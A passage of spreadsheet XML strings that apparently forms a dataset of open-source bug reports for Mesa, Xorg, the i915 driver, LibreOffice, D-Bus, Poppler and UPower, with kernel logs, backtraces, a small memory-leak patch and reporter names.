Date:   Fri May 6 10:31:24 2011 -0700
    GLX/DRI2: handle swap event swap count wrapping
    Create a new GLX drawable struct to track client related info and add a
    wrap counter to it drawable and track it as we receive events.  This
    allows us to support the full 64 bits of the event structure we pass to
    the client even though the server only gives us a 32 bit count.
    Reviewed-by: Michel DÃ¤nzer 
    Reviewed-by: Jeremy Huddleston 
    Signed-off-by: Jesse Barnes 
I'm not 100% sure about this commit since the issue is not always reproducible but it seems likely this can be it.
This is with r300g driver RV530 card. Assigning to mesa core because of the bisect results I did try the llvmpipe to see if other drivers are also affected however it is so slow here I can't change any settings.
Mesa: 110f846c2578357ebee4e6fab7d71e0e496493d3
GPU: RV530
Kernel: 2.6.40.3-0.fc15.i686 (probably renamed 3.0.3 for some reason)
Xserver: 1.10.3</t>
  </si>
  <si>
    <t>XORG-1188</t>
  </si>
  <si>
    <t>arm netwinder build broken</t>
  </si>
  <si>
    <t>Following is a patch to fix.
Gentoo log message for the patch:
-Add 9210_all_XFree86-4.3.0-arm32-compiler.h.patch (#52707) from netwinder.org.
    This fixes compiles for the ARM architecture. Patch from PhilB according
    to netwinder's RPM spec file.</t>
  </si>
  <si>
    <t>DRI-97666</t>
  </si>
  <si>
    <t>Kernel NULL pointer dereference with MST monitor on HSW</t>
  </si>
  <si>
    <t>Created attachment 126335
dmesg with drm.debug=0xe
Steps to reproduce:
1. Boot machine (Haswell also saw on Skylake) with MST monitor (Dell UP2414Q DP1.2 enabled) attached. It boots fine.
2. Disable the monitor with button on front.
3. Re-enable the monitor. Nothing appears on the screen. It goes to sleep.
4. Switch to linux console (C-A-F1) and back. It brings the monitor back alive.
5. Switch to linux console again. Kernel crashes.</t>
  </si>
  <si>
    <t>carlos.santa</t>
  </si>
  <si>
    <t>kirill</t>
  </si>
  <si>
    <t>DRI-51058</t>
  </si>
  <si>
    <t>[IVB] *ERROR* Hangcheck timer elapsed... GPU hung</t>
  </si>
  <si>
    <t>Created attachment 63005
Ivy Bridge  upstart X i915 report hang  and desktop Huaping
upstart X GPU hang 
[    3.398860] dracut: dracut-005-3.nk.1
[    3.404428] dracut: rd_NO_LUKS: removing cryptoluks activation
[    3.405543] dracut: rd_NO_LVM: removing LVM activation
[    3.411871] udev: starting version 151
[    3.411953] udevd (113): /proc/113/oom_adj is deprecated please use /proc/113/oom_score_adj instead.
[    3.429612] [drm] Initialized drm 1.1.0 20060810
[    3.431947] i915 0000:00:02.0: PCI INT A -&gt; GSI 16 (level low) -&gt; IRQ 16
[    3.431950] i915 0000:00:02.0: setting latency timer to 64
[    3.445475] i915 0000:00:02.0: irq 40 for MSI/MSI-X
[    3.445481] [drm] Supports vblank timestamp caching Rev 1 (10.10.2010).
[    3.445482] [drm] Driver supports precise vblank timestamp query.
[    3.445499] vgaarb: device changed decodes: PCI:0000:00:02.0olddecodes=io+memdecodes=io+mem:owns=io+mem
[    3.667467] fbcon: inteldrmfb (fb0) is primary device
[    3.831725] Console: switching to colour frame buffer device 180x56
[    3.836751] fb0: inteldrmfb frame buffer device
[    3.836754] drm: registered panic notifier
[    3.840480] acpi device:4e: registered as cooling_device9
[    3.840686] input: Video Bus as /devices/LNXSYSTM:00/device:00/PNP0A08:00/LNXVIDEO:00/input/input4
[    3.841038] ACPI: Video Device [GFX0] (multi-head: yes  rom: no  post: no)
[    3.841062] [drm] Initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0
[    3.884018] dracut: Starting plymouth daemon
[    4.287190] dracut: rd_NO_DM: removing DM RAID activation
[    4.288798] dracut: rd_NO_MD: removing MD RAID activation
[    4.686435] EXT4-fs (sda1): mounted filesystem with ordered data mode. Opts: (null)
[    4.740960] dracut: Mounted root filesystem /dev/sda1
[    4.867219] dracut: Loading SELinux policy
[    5.092598] SELinux:  Disabled at runtime.
[    5.092614] SELinux:  Unregistering netfilter hooks
[    5.097397] type=1404 audit(1339604709.101:2): selinux=0 auid=4294967295 ses=4294967295
[    5.179309] dracut: /sbin/load_policy: æ— æ³•åŠ è½½ç­–ç•¥ï¼š æ²¡æœ‰é‚£ä¸ªæ–‡ä»¶æˆ–ç›®å½•
[    5.241137] dracut: Switching root
[    5.845955] readahead: starting
[    6.491004] udev: starting version 151
[    7.265360] microcode: CPU0 sig=0x306a9 pf=0x2 revision=0x10
[    7.512956] microcode: CPU1 sig=0x306a9 pf=0x2 revision=0x10
[    7.513705] microcode: CPU2 sig=0x306a9 pf=0x2 revision=0x10
[    7.514393] microcode: CPU3 sig=0x306a9 pf=0x2 revision=0x10
[    7.518612] microcode: Microcode Update Driver: v2.00  Peter Oruba
[    7.580791] i801_smbus 0000:00:1f.3: PCI INT C -&gt; GSI 18 (level low) -&gt; IRQ 18
[    7.637324] r8169 Gigabit Ethernet driver 2.3LK-NAPI loaded
[    7.637350] r8169 0000:04:00.0: PCI INT A -&gt; GSI 17 (level low) -&gt; IRQ 17
[    7.637399] r8169 0000:04:00.0: setting latency timer to 64
[    7.637497] r8169 0000:04:00.0: irq 41 for MSI/MSI-X
[    7.637643] r8169 0000:04:00.0: eth0: RTL8168evl/8111evl at 0xf7f7e000 e8:40:f2:85:e1:28 XID 0c900800 IRQ 41
[    7.671491] parport_pc 00:0a: reported by Plug and Play ACPI
[    7.671578] parport0: PC-style at 0x378 (0x778) irq 5 [PCSPPTRISTATE]
[    7.755805] iTCO_vendor_support: vendor-support=0
[    7.759542] iTCO_wdt: Intel TCO WatchDog Timer Driver v1.06
[    7.759614] iTCO_wdt: Found a Cougar Point TCO device (Version=2 TCOBASE=0x0460)
[    7.759726] iTCO_wdt: initialized. heartbeat=30 sec (nowayout=0)
[    7.800647] ppdev: user-space parallel port driver
[    8.048567] snd_hda_intel 0000:00:1b.0: PCI INT A -&gt; GSI 22 (level low) -&gt; IRQ 22
[    8.048636] snd_hda_intel 0000:00:1b.0: irq 42 for MSI/MSI-X
[    8.048675] snd_hda_intel 0000:00:1b.0: setting latency timer to 64
[    8.389411] ALSA sound/pci/hda/patch_realtek.c:1226 SKU: Nid=0x1d sku_cfg=0x4004c601
[    8.389425] ALSA sound/pci/hda/patch_realtek.c:1228 SKU: port_connectivity=0x1
[    8.389426] ALSA sound/pci/hda/patch_realtek.c:1229 SKU: enable_pcbeep=0x0
[    8.389428] ALSA sound/pci/hda/patch_realtek.c:1230 SKU: check_sum=0x00000004
[    8.389429] ALSA sound/pci/hda/patch_realtek.c:1231 SKU: customization=0x000000c6
[    8.389430] ALSA sound/pci/hda/patch_realtek.c:1232 SKU: external_amp=0x0
[    8.389431] ALSA sound/pci/hda/patch_realtek.c:1233 SKU: platform_type=0x0
[    8.389432] ALSA sound/pci/hda/patch_realtek.c:1234 SKU: swap=0x0
[    8.389433] ALSA sound/pci/hda/patch_realtek.c:1235 SKU: override=0x1
[    8.389602] ALSA sound/pci/hda/hda_codec.c:3952 hda_codec: model 'auto' is selected
[    8.389607] ALSA sound/pci/hda/hda_codec.c:4895 autoconfig: line_outs=1 (0x14/0x0/0x0/0x0/0x0) type:line
[    8.389610] ALSA sound/pci/hda/hda_codec.c:4899    speaker_outs=0 (0x0/0x0/0x0/0x0/0x0)
[    8.389613] ALSA sound/pci/hda/hda_codec.c:4903    hp_outs=1 (0x1b/0x0/0x0/0x0/0x0)
[    8.389615] ALSA sound/pci/hda/hda_codec.c:4904    mono: mono_out=0x0
[    8.389617] ALSA sound/pci/hda/hda_codec.c:4907    dig-out=0x1e/0x0
[    8.389619] ALSA sound/pci/hda/hda_codec.c:4908    inputs:
[    8.389622] ALSA sound/pci/hda/hda_codec.c:4912  Rear Mic=0x18
[    8.389625] ALSA sound/pci/hda/hda_codec.c:4912  Front Mic=0x19
[    8.389627] ALSA sound/pci/hda/hda_codec.c:4912  Line=0x1a
[    8.389629] ALSA sound/pci/hda/hda_codec.c:4914 
[    8.391271] ALSA sound/pci/hda/patch_realtek.c:1289 realtek: No valid SSID checking pincfg 0x4004c601 for NID 0x1d
[    8.391275] ALSA sound/pci/hda/patch_realtek.c:1305 realtek: Enabling init ASM_ID=0xc601 CODEC_ID=10ec0662
[    8.395845] input: HDA Intel PCH Headphone as /devices/pci0000:00/0000:00:1b.0/sound/card0/input5
[    9.387481] EXT4-fs (sda1): re-mounted. Opts: (null)
[   11.867962] r8169 0000:04:00.0: eth0: link down
[   11.868100] ADDRCONF(NETDEV_UP): eth0: link is not ready
[   12.211666] RPC: Registered named UNIX socket transport module.
[   12.211670] RPC: Registered udp transport module.
[   12.211671] RPC: Registered tcp transport module.
[   12.211673] RPC: Registered tcp NFSv4.1 backchannel transport module.
[   29.131134] [drm:i915_hangcheck_elapsed] *ERROR* Hangcheck timer elapsed... GPU hung
[   29.132651] [drm] capturing error event look for more information in /debug/dri/0/i915_error_state
[   29.145512] [drm:i915_wait_request] *ERROR* i915_wait_request returns -11 (awaiting 373 at 369 next 374)
[   35.720290] [drm:i915_hangcheck_elapsed] *ERROR* Hangcheck timer elapsed... GPU hung
[   35.722356] [drm:i915_wait_request] *ERROR* i915_wait_request returns -11 (awaiting 893 at 889 next 894)
_wait_scan]
[  341.101600] Pid: 1605 comm: cp Tainted: G        W   3.1.6-1.nk.i686.PAE #1
[  341.101601] Call Trace:
[  341.101602]  [] warn_slowpath_common+0x72/0xa0
[  341.101608]  [] ? gen6_gt_force_wake_get+0x3f/0x50 [i915]
[  341.101611]  [] ? gen6_gt_force_wake_get+0x3f/0x50 [i915]
[  341.101613]  [] warn_slowpath_null+0x22/0x30
[  341.101617]  [] gen6_gt_force_wake_get+0x3f/0x50 [i915]
[  341.101620]  [] i915_inttoext_table+0x3f/0xf0 [i915]
[  341.101622]  [] seq_read+0xf5/0x390
[  341.101624]  [] vfs_read+0x9f/0x170
[  341.101626]  [] ? seq_lseek+0x170/0x170
[  341.101627]  [] sys_read+0x42/0x70
[  341.101629]  [] sysenter_do_call+0x12/0x28
[  341.101631] ---[ end trace ac295d8e8cbf1b07 ]---
[  341.102152] ------------[ cut here ]------------
[  341.102156] WARNING: at drivers/gpu/drm/i915/i915_drv.c:372 gen6_gt_force_wake_put+0x49/0x50 [i915]()
[  341.102157] Hardware name: GREATWALL PC
[  341.102157] Modules linked in: vfat fat usb_storage sunrpc binfmt_misc snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep i2c_i801 snd_seq iTCO_wdt snd_seq_device iTCO_vendor_support r8169 snd_pcm snd_timer snd soundcore snd_page_alloc mii ppdev parport_pc parport microcode i915 drm_kms_helper drm i2c_algo_bit i2c_core video [last unloaded: scsi_wait_scan]
[  341.102167] Pid: 1605 comm: cp Tainted: G        W   3.1.6-1.nk.i686.PAE #1
[  341.102167] Call Trace:
[  341.102169]  [] warn_slowpath_common+0x72/0xa0
[  341.102172]  [] ? gen6_gt_force_wake_put+0x49/0x50 [i915]
[  341.102176]  [] ? gen6_gt_force_wake_put+0x49/0x50 [i915]
[  341.102177]  [] warn_slowpath_null+0x22/0x30
[  341.102181]  [] gen6_gt_force_wake_put+0x49/0x50 [i915]
[  341.102185]  [] i915_inttoext_table+0x54/0xf0 [i915]
[  341.102187]  [] seq_read+0xf5/0x390
[  341.102188]  [] vfs_read+0x9f/0x170
[  341.102190]  [] ? seq_lseek+0x170/0x170
[  341.102192]  [] sys_read+0x42/0x70
[  341.102193]  [] sysenter_do_call+0x12/0x28
[  341.102194] ---[ end trace ac295d8e8cbf1b08 ]---
[  341.102196] ------------[ cut here ]------------
[  341.102199] WARNING: at drivers/gpu/drm/i915/i915_drv.c:354 gen6_gt_force_wake_get+0x3f/0x50 [i915]()
[  341.102200] Hardware name: GREATWALL PC
[  341.102201] Modules linked in: vfat fat usb_storage sunrpc binfmt_misc snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep i2c_i801 snd_seq iTCO_wdt snd_seq_device iTCO_vendor_support r8169 snd_pcm snd_timer snd soundcore snd_page_alloc mii ppdev parport_pc parport microcode i915 drm_kms_helper drm i2c_algo_bit i2c_core video [last unloaded: scsi_wait_scan]
[  341.102210] Pid: 1605 comm: cp Tainted: G        W   3.1.6-1.nk.i686.PAE #1
[  341.102211] Call Trace:
[  341.102212]  [] warn_slowpath_common+0x72/0xa0
[  341.102216]  [] ? gen6_gt_force_wake_get+0x3f/0x50 [i915]
[  341.102219]  [] ? gen6_gt_force_wake_get+0x3f/0x50 [i915]
[  341.102221]  [] warn_slowpath_null+0x22/0x30
[  341.102224]  [] gen6_gt_force_wake_get+0x3f/0x50 [i915]
[  341.102228]  [] i915_inttoext_table+0x3f/0xf0 [i915]
[  341.102230]  [] seq_read+0xf5/0x390
[  341.102232]  [] vfs_read+0x9f/0x170
[  341.102233]  [] ? seq_lseek+0x170/0x170
[  341.102235]  [] sys_read+0x42/0x70
[  341.102236]  [] sysenter_do_call+0x12/0x28
[  341.102237] ---[ end trace ac295d8e8cbf1b09 ]---
[  341.102761] ------------[ cut here ]------------
[  341.102765] WARNING: at drivers/gpu/drm/i915/i915_drv.c:372 gen6_gt_force_wake_put+0x49/0x50 [i915]()
[  341.102766] Hardware name: GREATWALL PC
[  341.102766] Modules linked in: vfat fat usb_storage sunrpc binfmt_misc snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep i2c_i801 snd_seq iTCO_wdt snd_seq_device iTCO_vendor_support r8169 snd_pcm snd_timer snd soundcore snd_page_alloc mii ppdev parport_pc parport microcode i915 drm_kms_helper drm i2c_algo_bit i2c_core video [last unloaded: scsi_wait_scan]
[  341.102776] Pid: 1605 comm: cp Tainted: G        W   3.1.6-1.nk.i686.PAE #1
[  341.102777] Call Trace:
[  341.102778]  [] warn_slowpath_common+0x72/0xa0
[  341.102782]  [] ? gen6_gt_force_wake_put+0x49/0x50 [i915]
[  341.102786]  [] ? gen6_gt_force_wake_put+0x49/0x50 [i915]
[  341.102788]  [] warn_slowpath_null+0x22/0x30
[  341.102793]  [] gen6_gt_force_wake_put+0x49/0x50 [i915]
[  341.102797]  [] i915_inttoext_table+0x54/0xf0 [i915]
[  341.102800]  [] seq_read+0xf5/0x390
[  341.102803]  [] vfs_read+0x9f/0x170
[  341.102805]  [] ? seq_lseek+0x170/0x170
[  341.102808]  [] sys_read+0x42/0x70
[  341.102810]  [] sysenter_do_call+0x12/0x28
[  341.102812] ---[ end trace ac295d8e8cbf1b0a ]---
[  341.102814] ------------[ cut here ]------------
[  341.102818] WARNING: at drivers/gpu/drm/i915/i915_drv.c:354 gen6_gt_force_wake_get+0x3f/0x50 [i915]()
[  341.102819] Hardware name: GREATWALL PC
[  341.102820] Modules linked in: vfat fat usb_storage sunrpc binfmt_misc snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep i2c_i801 snd_seq iTCO_wdt snd_seq_device iTCO_vendor_support r8169 snd_pcm snd_timer snd soundcore snd_page_alloc mii ppdev parport_pc parport microcode i915 drm_kms_helper drm i2c_algo_bit i2c_core video [last unloaded: scsi_wait_scan]
[  341.102846] Pid: 1605 comm: cp Tainted: G        W   3.1.6-1.nk.i686.PAE #1
[  341.102847] Call Trace:
[  341.102849]  [] warn_slowpath_common+0x72/0xa0
[  341.102854]  [] ? gen6_gt_force_wake_get+0x3f/0x50 [i915]
[  341.102858]  [] ? gen6_gt_force_wake_get+0x3f/0x50 [i915]
[  341.102861]  [] warn_slowpath_null+0x22/0x30
[  341.102865]  [] gen6_gt_force_wake_get+0x3f/0x50 [i915]
[  341.102870]  [] i915_inttoext_table+0x3f/0xf0 [i915]
[  341.102873]  [] seq_read+0xf5/0x390
[  341.102875]  [] vfs_read+0x9f/0x170
[  341.102878]  [] ? seq_lseek+0x170/0x170
[  341.102880]  [] sys_read+0x42/0x70
[  341.102883]  [] sysenter_do_call+0x12/0x28
[  341.102884] ---[ end trace ac295d8e8cbf1b0b ]---
[  341.103417] ------------[ cut here ]------------
[  341.103420] WARNING: at drivers/gpu/drm/i915/i915_drv.c:372 gen6_gt_force_wake_put+0x49/0x50 [i915]()
[  341.103421] Hardware name: GREATWALL PC
[  341.103422] Modules linked in: vfat fat usb_storage sunrpc binfmt_misc snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep i2c_i801 snd_seq iTCO_wdt snd_seq_device iTCO_vendor_support r8169 snd_pcm snd_timer snd soundcore snd_page_alloc mii ppdev parport_pc parport microcode i915 drm_kms_helper drm i2c_algo_bit i2c_core video [last unloaded: scsi_wait_scan]
[  341.103431] Pid: 1605 comm: cp Tainted: G        W   3.1.6-1.nk.i686.PAE #1</t>
  </si>
  <si>
    <t>leolzbing521</t>
  </si>
  <si>
    <t>DRI-107916</t>
  </si>
  <si>
    <t>[CI][BAT] igt@drv_selftest@live_hangcheck - dmesg-fail - failed to idle after reset</t>
  </si>
  <si>
    <t>As per Chris' comment in https://bugs.freedesktop.org/show_bug.cgi?id=106560 specifying that any new failure in igt@drv_selftest@live_hangcheck should be treated as a separate bug I am opening a new bug:
https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_4811/fi-cfl-s3/igt@drv_selftest@live_hangcheck.html
[  503.668876] Setting dangerous option live_selftests - tainting kernel
[  526.201555] i915_reset_engine(vcs0:others-active): failed to idle after reset
[  526.206678] i915/intel_hangcheck_live_selftests: igt_reset_engines failed with error -5
[  526.314861] i915: probe of 0000:00:02.0 failed with error -5</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-11709</t>
  </si>
  <si>
    <t>MESA-25971</t>
  </si>
  <si>
    <t>glxinfo segfault</t>
  </si>
  <si>
    <t>Mesa 7.7 xorg 7.4.5 xf86-video-intel 2.10.0
glxinfo crash:
Program received signal SIGSEGV Segmentation fault.
0xb79edd8f in i915_state_draw_region (intel=0x806bed8 state=0x80823e8 color_region=0x83a9ce0 depth_region=0x0) at i915_vtbl.c:616
616	      value |= CLASSIC_EARLY_DEPTH
(gdb) bt
#0  0xb79edd8f in i915_state_draw_region (intel=0x806bed8 state=0x80823e8 color_region=0x83a9ce0 depth_region=0x0) at i915_vtbl.c:616
#1  0xb79ede36 in i915_set_draw_region (intel=0x806bed8 color_regions=0xbfffec90 depth_region=0x0 num_regions=1) at i915_vtbl.c:655
#2  0xb79df980 in intel_draw_buffer (ctx=0x806bed8 fb=0x839cba8) at intel_buffers.c:312
#3  0xb79f0d9f in intel_viewport (ctx=0x806bed8 x=0 y=0 w=100 h=100) at intel_context.c:418
#4  0xb79ec2a5 in i915Viewport (ctx=0x806bed8 x=0 y=0 width=100 height=100) at i915_state.c:398
#5  0xb7aa537a in _mesa_set_viewport (ctx=0x806bed8 x=0 y=0 width= height=277349120) at main/viewport.c:101
#6  0xb7a34328 in _mesa_check_init_viewport (ctx=0x806bed8 width=100 height=100) at main/context.c:1246
#7  0xb7a3450b in _mesa_make_current (newCtx=0x806bed8 drawBuffer=0x839cba8 readBuffer=0x839cba8) at main/context.c:1370
#8  0xb79f0be6 in intelMakeCurrent (driContextPriv=0x8061188 driDrawPriv=0x83a9b08 driReadPriv=0x83a9b08) at intel_context.c:993
#9  0xb79ca36e in driBindContext (pcp=0x8061188 pdp=0x83a9b08 prp=0x83a9b08) at ../common/dri_util.c:207
#10 0xb7f972fc in dri2BindContext (context=0x8058e78 draw=0x83a9a70 read=0x83a9a70) at dri2_glx.c:107
#11 0xb7f75b3f in MakeContextCurrent (dpy=0x804e008 draw=58720259 read=58720259 gc=0x8067db0) at glxcurrent.c:379
#12 0xb7f75ea7 in glXMakeCurrent (dpy=0x804e008 draw=58720259 gc=0x8067db0) at glxcurrent.c:512
#13 0x0804a905 in print_screen_info (argc=1 argv=0xbffff254) at glxinfo.c:469
#14 main (argc=1 argv=0xbffff254) at glxinfo.c:1168
...but it works with LIBGL_ALWAYS_INDIRECT=1 set.</t>
  </si>
  <si>
    <t>POPPLER-46708</t>
  </si>
  <si>
    <t>File name pattern output by pdftoppm doesn't match documentation</t>
  </si>
  <si>
    <t>pdftoppm's man page says:
  Pdftoppm reads the PDF file PDF-file and writes one PPM file for each page PPM-root-nnnnnn.ppm where nnnnnn is the page number.
but the length of the page number string (nnnnnn) isn't 6 but variable. This breaks programs which expect it to have a fixed length.
The change was introduced in the following commit:
http://cgit.freedesktop.org/poppler/poppler/commit/utils/pdftoppm.cc?id=3ba088d8caee3c40c2aba0cd85adcf9195ae88a3
The snprintf format string was changed from %.*s-%06d.%s to %.*s-%0*d.%s.</t>
  </si>
  <si>
    <t>alexandre.magaz</t>
  </si>
  <si>
    <t>XORG-9670</t>
  </si>
  <si>
    <t>[modesetting] OpenGL texture corruption</t>
  </si>
  <si>
    <t>This happens on an Intel MacMini (i945GM) running in pure EFI mode.
Using the 'test' example from the clutter toolkit
(http://projects.o-hand.com/clutter/) I get a texture corruption once out of 2
tries. I'll attach a screenshot of the corruption look for the horizontal
garbage line in the background picture.
When I managed to get the S-Video output working some days ago I noticed that I
couldn't reproduce this corruption using the TV out. Could this be a clue that
the bug is actually in the driver and not in the application?
Any idea how I can track that more precisely down?</t>
  </si>
  <si>
    <t>frederic.riss</t>
  </si>
  <si>
    <t>LIBREOFFICE-41796</t>
  </si>
  <si>
    <t>HTML: exported table borders cannot be imported again</t>
  </si>
  <si>
    <t>Every time I edit an html document with borders on the tables at opening the borders are completely turned off.
For example: I have several tables in various html documents that have borders turned on for everything - top bottom sides in between rows. Every time before closing the document I have to turn on the borders AGAIN. And every time I re-edit the document the borders have to be turned on AGAIN.</t>
  </si>
  <si>
    <t>dahechler</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-30197</t>
  </si>
  <si>
    <t>Requesting a freedesktop account</t>
  </si>
  <si>
    <t>In Xorg development mailing list Tiago suggests me to get a freedesktop account for pushing my Xephyr DRI2 extension patch into Xephyr repository.
Real name:  Haitao Feng
Email addr: haitao.feng@intel.com
Preferred account: haitao or haitao.feng
My gpg public key and ssh public key are attached.</t>
  </si>
  <si>
    <t>haitao.feng</t>
  </si>
  <si>
    <t>DBUS-25697</t>
  </si>
  <si>
    <t>small memory leak on reload</t>
  </si>
  <si>
    <t>diff -up dbus-1.2.16/bus/bus.c.policy-leak dbus-1.2.16/bus/bus.c
--- dbus-1.2.16/bus/bus.c.policy-leak   2009-12-17 19:18:50.966795963 -0500
+++ dbus-1.2.16/bus/bus.c       2009-12-17 19:17:36.023796405 -0500
@@ -4386 +4388 @@ process_config_every_time (BusContext   
   /* get our limits and timeout lengths */
   bus_config_parser_get_limits (parser 
+  if (context-&gt;policy)
+    bus_policy_unref (context-&gt;policy)
   context-&gt;policy = bus_config_parser_steal_policy (parser)
   _dbus_assert (context-&gt;policy != NULL)</t>
  </si>
  <si>
    <t>XORG-29740</t>
  </si>
  <si>
    <t>xorg-server 1.9.0 configure script not using dri.pc</t>
  </si>
  <si>
    <t>hello
i wrote this to the mailing list long ago and somebody wanted to fix it. as things turn out he forgot about it :) i post it here now to keep it pending.
xorg-server 1.9.0 is out and still needs --with-dri-driver-path to find the dri modules though there is dri.pc.
please let us get rid of this very long option before xorg 7.6 is out )
many thanks!</t>
  </si>
  <si>
    <t>ersuchungen</t>
  </si>
  <si>
    <t>LIBREOFFICE-37646</t>
  </si>
  <si>
    <t>Crash when Inserting form control into Chart</t>
  </si>
  <si>
    <t>Created attachment 47199
Try inserting the green rectangle that work. Try same with text box. Crash.
It is possible to insert a drawing object into a chart. For example draw a rectangle copy it to clip board set chart to editing mode and paste the rectangle.
Because titles cannot be linked to a cell but form control text box has this feature I try to insert the form control into the chart. This results in an immediately crash.
You may argue that it is not intended to insert form controls into charts but then LO shall not crash but simple refuse to do so.</t>
  </si>
  <si>
    <t>XORG-21879</t>
  </si>
  <si>
    <t>s-video tv out not working on RV670</t>
  </si>
  <si>
    <t>Created attachment 26118
Xorg-log
s-video tv out does not work on my HD3850 AGP card.
xorg.conf contains 
Option          ATOMTvOut true
Option          TVStandard    pal
and xrandr (--verbose attached) shows DIN as connected but there is no signal to TV.
Before starting X TV-out works OK and I get a clone of my CRT/vga monitor on the TV. When X is started the TV looses signal. If I then quit X the output to both TV and monitor become corrupted. The monitor has green text instead of white and both the background and the text on the TV is green.
If I use xorg vesa driver then tv out works OK and clones a 1024x768 desktop.
I tested with 800x600 and 1024x768 starting res in xorg.conf with the same results - If I try and change res with xrandr -s then the monitor goes into standby but X is still alive.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-13388</t>
  </si>
  <si>
    <t>link to SupportMailingList</t>
  </si>
  <si>
    <t>* Send other questions or comments to the xorg mailing list.
The above should link to SupportMailingList instead of the subscription page directly.</t>
  </si>
  <si>
    <t>DRI-22247</t>
  </si>
  <si>
    <t>[G45] Both HDMI take one pipe</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #21120 +++
copied from bug# 21120 comment# 39  after patch in bug# 21120 comment# 42 applied... Both HDMI
outputs are put in the same pipe. I think they shouldn't...
(II) intel(0): Output configuration:
(II) intel(0):   Pipe A is on
(II) intel(0):   Display plane A is now enabled and connected to pipe A.
(II) intel(0):   Pipe B is off
(II) intel(0):   Display plane B is now disabled and connected to pipe B.
(II) intel(0):   Output VGA is connected to pipe none
(II) intel(0):   Output HDMI-1 is connected to pipe A
(II) intel(0):   Output HDMI-2 is connected to pipe A
(II) intel(0): RandR 1.2 enabled ignore the following RandR disabled message.</t>
  </si>
  <si>
    <t>DRI-21185</t>
  </si>
  <si>
    <t>[GEM] i915 driver attempts to sleep while atomic</t>
  </si>
  <si>
    <t>Every once in a while xorg will lock up the entire machine for a few seconds and the following can be found in the kernel log.
BUG: sleeping function called from invalid context at fs/file_table.c:267
in_atomic(): 1 irqs_disabled(): 0 pid: 3649 name: Xorg
Pid: 3649 comm: Xorg Not tainted 2.6.29work #31
Call Trace:
 [] __might_sleep+0x129/0x12b
 [] __fput+0x3a/0x19b
 [] fput+0x1d/0x1f
 [] drm_gem_object_free+0x3d/0x6b [drm]
 [] ? drm_gem_object_free+0x0/0x6b [drm]
 [] kref_put+0x4b/0x55
 [] drm_gem_object_unreference+0x1a/0x1c [i915]
 [] i915_gem_object_move_to_inactive+0x6c/0x71 [i915]
 [] i915_gem_retire_requests+0xda/0x12f [i915]
 [] ? i915_gem_set_domain_ioctl+0x0/0xd0 [i915]
 [] i915_wait_request+0x17a/0x18b [i915]
 [] ? _spin_unlock+0x2f/0x3a
 [] ? i915_gem_object_move_to_active+0x5e/0x6b [i915]
 [] ? i915_gem_set_domain_ioctl+0x0/0xd0 [i915]
 [] i915_gem_object_wait_rendering+0x34/0x36 [i915]
 [] i915_gem_object_set_to_cpu_domain+0x29/0xe8 [i915]
 [] ? i915_gem_set_domain_ioctl+0x0/0xd0 [i915]
 [] i915_gem_set_domain_ioctl+0xa6/0xd0 [i915]
 [] ? avc_has_perm_noaudit+0x4a4/0x4f0
 [] drm_ioctl+0x210/0x2ce [drm]
 [] ? avc_has_perm+0x5c/0x71
 [] ? do_sync_read+0xe8/0x125
 [] vfs_ioctl+0x6f/0x87
 [] do_vfs_ioctl+0x45f/0x4a0
 [] sys_ioctl+0x56/0x79
 [] system_call_fastpath+0x16/0x1b
BUG: scheduling while atomic: Xorg/3649/0x10000002</t>
  </si>
  <si>
    <t>UPOWER-70952</t>
  </si>
  <si>
    <t>On boot and login with ac power battery shows zero percent when it is full</t>
  </si>
  <si>
    <t>Dell M4300 laptop (and also Samsung Q35 laptop) both show a upower battery output of zero percent when the battery is fully charged when booted to archlinux fully up to date with the ac power cord connected.  Yet acpi -b output confirms the battery is fully charged and the kernel appears also to be correctly reporting the battery state.
Versions are upower 0.9.23-1 (but the same problem occurred with version 0.9.22)
Battery status from the various sources of data are:
[mike@lapmike3 ~]$ cat /sys/class/power_supply/BAT0/charge_now
5200000
[mike@lapmike3 ~]$ acpi -b
Battery 0: Full 100%
[mike@lapmike3 ~]$ upower -d
Device: /org/freedesktop/UPower/devices/line_power_AC
  native-path:          AC
  power supply:         yes
  updated:              Mon 28 Oct 2013 10:46:54 GMT (782 seconds ago)
  has history:          no
  has statistics:       no
  line-power
    online:             yes
Device: /org/freedesktop/UPower/devices/battery_BAT0
  native-path:          BAT0
  vendor:               SMP
  model:                DELL XD7368
  serial:               3261
  power supply:         yes
  updated:              Mon 28 Oct 2013 10:46:59 GMT (777 seconds ago)
  has history:          yes
  has statistics:       yes
  battery
    present:             yes
    rechargeable:        yes
    state:               fully-charged
    energy:              57.72 Wh
    energy-empty:        0 Wh
    energy-full:         57.72 Wh
    energy-full-design:  57.72 Wh
    energy-rate:         6.0051 W
    voltage:             12.004 V
    percentage:          0%
    capacity:            92.4615%
    technology:          lithium-ion
Daemon:
  daemon-version:  0.9.23
  on-battery:      no
  on-low-battery:  no
  lid-is-closed:   no
  lid-is-present:  yes
  is-docked:       no
It is noticed that the percentage 0% is not consistent with state fully-charged in the upower output.
The symptoms look similar to the report at https://bugs.freedesktop.org/show_bug.cgi?id=49846 which was never resolved.
Also I had previously reported this to the KDE bug reports at https://bugs.kde.org/show_bug.cgi?id=326332</t>
  </si>
  <si>
    <t>LIBREOFFICE-64584</t>
  </si>
  <si>
    <t>Vertical writing mode is not functional.</t>
  </si>
  <si>
    <t>When the text direction is right-to-left (vertical) (vertical layout) Writer won't accept any key input at all and on each key stroke the displayed area flickers a bit.
To enable vertical layout you need to 
1. check Show UI elements for East Asian writings in the Options dialog (Language Settings - Languages under Enhanced language support) and 
2. go to Format - Page and change the text direction from left-to-right (horizontal to right-to-left (vertical).
Once done try to type any characters it won't be accepted.</t>
  </si>
  <si>
    <t>LIBREOFFICE-43938</t>
  </si>
  <si>
    <t>UI: Default area color without name in Impress/Draw</t>
  </si>
  <si>
    <t>Created attachment 54550
screen shot
See screen shot: []</t>
  </si>
  <si>
    <t>LIBREOFFICE-44516</t>
  </si>
  <si>
    <t>label PRINTING misplaced in case of non-symmetrical label forms</t>
  </si>
  <si>
